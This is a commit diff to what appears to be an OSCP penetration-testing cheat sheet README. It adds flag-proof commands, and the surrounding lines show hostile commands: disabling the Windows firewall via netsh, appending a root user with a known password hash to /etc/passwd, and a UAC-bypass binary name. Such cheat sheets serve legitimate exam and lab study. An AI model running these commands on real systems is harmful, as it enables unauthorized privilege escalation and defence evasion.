Update README.md
This commit is contained in:
@@ -1100,6 +1100,9 @@ eventvwr-bypassuac-32.exe
|
|||||||
# Disable Windows Firewall
|
# Disable Windows Firewall
|
||||||
netsh advfirewall set allprofiles state off
|
netsh advfirewall set allprofiles state off
|
||||||
service_exec(conn, r'cmd /c netsh advfirewall set allprofiles state off')
|
service_exec(conn, r'cmd /c netsh advfirewall set allprofiles state off')
|
||||||
|
|
||||||
|
# OSCP Flag Proof
|
||||||
|
type proof.txt && whoami && hostname && ipconfig
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Credential Access
|
#### Credential Access
|
||||||
@@ -1536,6 +1539,9 @@ echo "temp:\$1\$ignite\$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash" >> /etc
|
|||||||
|
|
||||||
su temp
|
su temp
|
||||||
pass pass123
|
pass pass123
|
||||||
|
|
||||||
|
# OSCP Flag Proof
|
||||||
|
cat proof.txt && whoami && hostname && ip addr
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Service Exploits
|
#### Service Exploits
|
||||||
|
|||||||
Reference in New Issue
Block a user